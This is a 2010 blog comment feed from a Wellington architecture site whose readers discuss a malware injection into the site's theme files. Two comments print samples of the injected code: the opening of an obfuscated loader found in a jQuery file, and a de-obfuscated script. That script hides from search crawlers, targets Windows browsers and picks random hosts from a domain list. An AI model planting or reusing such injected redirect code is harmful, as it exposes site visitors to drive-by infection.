Comments on: Spamalotnot http://eyeofthefish.org/spamalotnot/ A wide-angle view of architecture, urban design and life in Wellington Mon, 06 Feb 2012 23:14:35 +0000 hourly 1 http://wordpress.org/?v=3.1.4 By: Maximus http://eyeofthefish.org/spamalotnot/#comment-17692 Maximus Thu, 22 Jul 2010 20:12:35 +0000 http://eyeofthefish.org/?p=2063#comment-17692 No, starkive, the whited out look (like the soft stomach flesh of a white bellied lemon shark) is just another 'theme' on the blogging software, while Philip takes the original one back to the basement and beats the heck out of it till it behaves itself. I think (and hope) that we (he) will have another (or the same one, revamped), back, soon. And I'll get back to posting soon (ish). I think. No, starkive, the whited out look (like the soft stomach flesh of a white bellied lemon shark) is just another ‘theme’ on the blogging software, while Philip takes the original one back to the basement and beats the heck out of it till it behaves itself.

I think (and hope) that we (he) will have another (or the same one, revamped), back, soon.

And I’ll get back to posting soon (ish). I think.

]]> By: starkive http://eyeofthefish.org/spamalotnot/#comment-17687 starkive Thu, 22 Jul 2010 02:00:20 +0000 http://eyeofthefish.org/?p=2063#comment-17687 Seen via Safari on a Mac, the site seems to have been gill netted and gaffed. Most of it is missing and the rest is strangely whited-out. I had no problems with the original virus scare, but things look pretty fishy to me now... Although to be fair we seem to have got a one-click comments count back. Seen via Safari on a Mac, the site seems to have been gill netted and gaffed. Most of it is missing and the rest is strangely whited-out. I had no problems with the original virus scare, but things look pretty fishy to me now…

Although to be fair we seem to have got a one-click comments count back.

]]> By: maximus http://eyeofthefish.org/spamalotnot/#comment-17686 maximus Thu, 22 Jul 2010 01:10:23 +0000 http://eyeofthefish.org/?p=2063#comment-17686 Yes thanks, we're ok ! Hopefully, spam and virus all gone ? How was your holiday in Sydney ? Yes thanks, we’re ok ! Hopefully, spam and virus all gone ?
How was your holiday in Sydney ?

]]> By: starkive http://eyeofthefish.org/spamalotnot/#comment-17684 starkive Wed, 21 Jul 2010 23:54:15 +0000 http://eyeofthefish.org/?p=2063#comment-17684 You OK under there? You OK under there?

]]> By: davidp http://eyeofthefish.org/spamalotnot/#comment-17677 davidp Tue, 20 Jul 2010 00:06:14 +0000 http://eyeofthefish.org/?p=2063#comment-17677 Philip... I keep browser and opsys patched, but I don't bother with anti-virus software. I doubt I'd be infected by an infected web site, but you never know. Once unescaped, the dodgy javascript resolved to the following: var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("watchtime")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["edisonsnightclub.com","gaindirectory.org","ideacoreportal.com","karenegren.com"],e=["aqua.","azure.","black.","blue.","brown.","chocolate.","coral.","cyan.","darkred.","fuchsia.","gold.","gray.","green.","indigo.","ivory.","khaki.","lime.","magenta.","maroon.","navy.","olive.","orange.","pink.","plum.","purple.","red.","silver.","snow.","violet.","white.","yellow."],f=Math.floor(Math.random()* d.length),g=Math.floor(Math.random()*e.length); dt=new Date;dt.setTime(dt.getTime()+9072E4); document.cookie="watchtime="+escape("watchtime")+"; expires="+dt.toGMTString()+"; path=/"; document.write('')}; I haven't written programs for years and have no idea what that does. The references to specific web sites makes me suspect it is advertising related tho. Anyone? Philip… I keep browser and opsys patched, but I don’t bother with anti-virus software. I doubt I’d be infected by an infected web site, but you never know.

Once unescaped, the dodgy javascript resolved to the following:

var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion;
if(document.cookie.indexOf(“watchtime”)==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf(“win”)!=-1){var d=["edisonsnightclub.com","gaindirectory.org","ideacoreportal.com","karenegren.com"],e=["aqua.","azure.","black.","blue.","brown.","chocolate.","coral.","cyan.","darkred.","fuchsia.","gold.","gray.","green.","indigo.","ivory.","khaki.","lime.","magenta.","maroon.","navy.","olive.","orange.","pink.","plum.","purple.","red.","silver.","snow.","violet.","white.","yellow."],f=Math.floor(Math.random()* d.length),g=Math.floor(Math.random()*e.length);
dt=new Date;dt.setTime(dt.getTime()+9072E4);
document.cookie=”watchtime=”+escape(“watchtime”)+”;
expires=”+dt.toGMTString()+”;
path=/”;
document.write(”)};

I haven’t written programs for years and have no idea what that does. The references to specific web sites makes me suspect it is advertising related tho. Anyone?

]]> By: Philip http://eyeofthefish.org/spamalotnot/#comment-17674 Philip Mon, 19 Jul 2010 12:34:10 +0000 http://eyeofthefish.org/?p=2063#comment-17674 Apologies for the disruption in service over the course of today, hopefully everything nasty should be snuffed out for good now. Please let me know if this is not the case. Also, in regards to davidp, its extremely unlikely to get malware from a website; I wouldnt worry about it unless your running an old operating system (XP or similar) as well as an old browser (version 6 or less of internet explorer) and also accidentally clicked/accepted whatever popup/dialog the site was offering. If so, the standard spyware/anti-virus scanning tools should be more than enough. The old theme will hopefully be restored soon, and ill work on upgrading the spam filter.... Apologies for the disruption in service over the course of today, hopefully everything nasty should be snuffed out for good now. Please let me know if this is not the case.

Also, in regards to davidp, its extremely unlikely to get malware from a website; I wouldnt worry about it unless your running an old operating system (XP or similar) as well as an old browser (version 6 or less of internet explorer) and also accidentally clicked/accepted whatever popup/dialog the site was offering. If so, the standard spyware/anti-virus scanning tools should be more than enough.

The old theme will hopefully be restored soon, and ill work on upgrading the spam filter….

]]> By: Maximus http://eyeofthefish.org/spamalotnot/#comment-17671 Maximus Sun, 18 Jul 2010 20:41:26 +0000 http://eyeofthefish.org/?p=2063#comment-17671 Spencer - thanks for that - hopefully Philip will be able to target that directly. Spencer – thanks for that – hopefully Philip will be able to target that directly.

]]> By: 60 MPa http://eyeofthefish.org/spamalotnot/#comment-17668 60 MPa Sun, 18 Jul 2010 10:03:35 +0000 http://eyeofthefish.org/?p=2063#comment-17668 Join Linux - we don't get that shite. "People say that if you run Microsoft Midori backwards you hear the sound of the Devil. That's nothing - if you run it forwards it installs Microsoft Midori" Join Linux – we don’t get that shite.

“People say that if you run Microsoft Midori backwards you hear the sound of the Devil. That’s nothing – if you run it forwards it installs Microsoft Midori”

]]> By: Spencer http://eyeofthefish.org/spamalotnot/#comment-17667 Spencer Sun, 18 Jul 2010 05:20:46 +0000 http://eyeofthefish.org/?p=2063#comment-17667 I still get a message that "Threat was blocked" and refers to file eyeofthefish.org/wp-content/themes/eye3/js/jquery.center.js It might just be a false alarm on my computer (Firefox 3.01 on Vista, using AVG Free 9.0.389) but worth checking out that file, which is a valid file for JQuery, however this is what the start of the proper one looks like /** * @author Alexandre Magno * @desc Center a element with jQuery * @version 1.0 * @example * $("element").center({ * * vertical: true, * horizontal: true * * }); * @obs With no arguments, the default is above * @license free * @param bool vertical, bool horizontal * @contribution Paulo Radichi * */ jQuery.fn.center = function(params) { ... and this is the start of what your web server is trying to send me... var st1 = 0;document.write(unescape('%3C%73%63%72%69%70%74%3E%76%61%72%20%64%63%2 .... I still get a message that “Threat was blocked” and refers to file

eyeofthefish.org/wp-content/themes/eye3/js/jquery.center.js

It might just be a false alarm on my computer (Firefox 3.01 on Vista, using AVG Free 9.0.389) but worth checking out that file, which is a valid file for JQuery, however this is what the start of the proper one looks like
/**
* @author Alexandre Magno
* @desc Center a element with jQuery
* @version 1.0
* @example
* $(“element”).center({
*
* vertical: true,
* horizontal: true
*
* });
* @obs With no arguments, the default is above
* @license free
* @param bool vertical, bool horizontal
* @contribution Paulo Radichi
*
*/
jQuery.fn.center = function(params) {

and this is the start of what your web server is trying to send me…

var st1 = 0;document.write(unescape(‘%3C%73%63%72%69%70%74%3E%76%61%72%20%64%63%2
….

]]> By: davidp http://eyeofthefish.org/spamalotnot/#comment-17666 davidp Sun, 18 Jul 2010 02:02:40 +0000 http://eyeofthefish.org/?p=2063#comment-17666 Does someone know what the specific name of the malware that EOT Fish was trying to infect us with was? That'd make it easier to check if people were vulnerable and infected. Does someone know what the specific name of the malware that EOT Fish was trying to infect us with was? That’d make it easier to check if people were vulnerable and infected.

]]>